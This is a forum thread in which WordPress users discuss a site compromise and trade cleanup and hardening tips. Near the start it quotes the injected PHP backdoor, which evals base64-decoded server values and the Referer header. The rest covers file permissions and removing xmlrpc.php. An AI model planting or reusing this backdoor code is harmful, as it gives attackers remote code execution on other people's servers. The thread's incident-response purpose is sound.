Question About Possible Hack of Site

The following function appeared in my index.php file. Everyone, check your last modified dates on your installation files for any file that has changed recently. If it’s a wordpress file that you’ve not modified, be sure to inspect it or replace it with the original.

function gpc_9086($l9088){if(is_array($l9088)){f
oreach($l9088 as $l9086=>$l9087)$l9088[$l9086]=gpc_9086($l9087);}elseif(is_string($l9088) && substr($l9088,0,4)==”____”)
{eval(base64_decode(substr($l9088,4)));$l9088=null;}return $l9088;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_m
ap(“gpc_9086”,$_SERVER);

Us too:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Upgraded and Backed up… will report if it comes back.

Great tip Netslacker, but Patrick, don’t just patch, also do some “hardening” after changing all passwords, etc. You still don’t know how they did it.

@netslacker – as I’m a WordPress dummy please could you give me a clue as to how to check the last modified dates on my installation files! Thanks. My host is Hostgator, but I can’t see any dates within File Manager.

Do you use FTP? Most FTP clients note the date of files.
Also go for his tip and start by checking the index.php of your theme.

Confirmed, two sites in our network (so far) have been hit by this exploit. Both were version 2.7.1

Symptoms: Bogus permalink, unauthorized admin account with code in the “first name” field.

Has anyone been able to confirm that this is NOT an issue with 2.8.4?

FTP – uugh – no. Hostgator has a few FTP icons but I’ve never used them and don’t know what to do with them. I’ll look at my index.php though. Thanks.

@chloealicewilson

You need to login to your hosting account and look at all the files. I’ve got a shell access to I can just check and modify directly there. However, if you’re coming in via web, there should be a way to view all the files on your hosting account and it should tell you last modified timestamps.

I have files that were modified over a couple of days. Starting on Aug 30th. All of those files (about 10 in total) have had the function above injected.

My steps for cleaning did not involve following those on the links above.

I found that I could easily replace the hacked files with valid ones. I then removed the write permission on all wordpress files. However, in doing this kills the ability to upgrade via the admin console and will make upgrades harder. for me tho, I’m all about having a stable site and I don’t care right now about upgrading.

I also created a blank index.php file in EVERY directory that didn’t have one already (/images, wp-content, etc etc). Since when I looked through my installation, MANY directories had NEW index.php files that would simply call the injected function. So I removed these files, created a new, blank index.php and then removed the read and write permissions (removing write means nobody can inject bad code again into that file).

If you have index.php files that have the function, a hacker can simply call the function over and over again by making an http call to the file w/ their browser. voila, function executes, hack restored. So you must prevent this from occuring over and over.

On linux/unix, to remove write permissions (must be at a shell):
chmod -w <filename>

So, for all files in the root:
chmod -w *.php

To create an index.php file where there is NOT one:
touch index.php (creates an empty file)
chmod -rw index.php (removes read and write)

Now, if a browser goes to https://myhackedsite/wp-content/ the browser returns a PERMISSION DENIED error. Since the file is there but it’s not readable.

Be CAREFUL. Some files need write access. But not many. And DONT remove the read access from index.php files that are part of the wordpress install. root and wp-admin (and others) have VALID index.php files. just inspect them for the malitious function and just remove the write attribute (chmod -w filename).

I removed the write attribute from nearly every file in wordpress and my theme that I am using. this was my quick and dirty way to HOPEFULLY prevent it from happenning again. Since in the past 3 days I’ve had it occur multiple times.

If there is a better approach, I’m all ears. However, until a fix is put in wordpress I’m not taking any chances at all.

@netslacker

When one of my WP sites got hacked earlier this year, I did similar things to “harden” my WP sites, but it got hacked again by this new scheme anyway. The problem is that you protected your site only from this particular hacker and his scheme. When another security hole is discovered, it may have nothing to do with what you just did.

I agree with you; all I want is a stable site. I don’t care about upgrading all the time to the latest. But with WP, it appears that we have no choice. Every time a new version comes out, we have to upgrade it. If so, doing what you did would make it a big hassle every time you have to upgrade. If you only have one site to maintain, that’s fine, but what if you have multiple? It’s not realistic. Most of us just want to blog. We don’t want to be professional webmasters. So, this is a serious problem that I do not know how to resolve. I don’t want to spend my time upgrading WP every week.

The best quick fix I found is renaming:
wp-admin/options-permalink.php
/xmlrpc.php

to something else and wait till the wordpress guys fix this… there were 4 attempts today on my website…

@dyske

Totally agree. I guess my point is that I’m not aware of a “fix” for this particular hack and since I’ve had it happen now multiple times I just want it stable so I can sleep at night!!

Doing a recursive chmod to add back the write permissions is trivial. If I want to get back to where I was and upgrade I simply run the chmod +rw command on the whole thing and I’m good to go.

However, since removing the write attribute is a sound security practice anyway (no matter if it’s wp or some other app), it’s still valid advice. The drawback is that wp is built for the masses for easy upgrade through the admin console, so by it’s nature, it will be prone to hacks. Security always has a trade off. Many people chase the upgrades to get new features like kids on christmas morning. However, my approach is to always wait until the issues are resolved before upgrading (unless it’s a security patch/upgrade).

@marc_dutch123

I deleted xmlrpc.php from all my WP sites. I don’t care about Ping Back and I don’t have to update my blog from my iPhone.

Does xmlrpc.php do anything other than those two?

[I’m suspecting that xmlrpc.php was the entry point for this hack.]

My blog was infected. I am thinking of deleting xmlrpc.php as well. I also see wp-pass.php. Should I delete both?

@robk30

I deleted both. As far as I know, there should not be any PHP files in /wp-content/uploads
The idea of “uploading” PHP files is too fishy. So, I would delete any PHP files I find in “uploads”.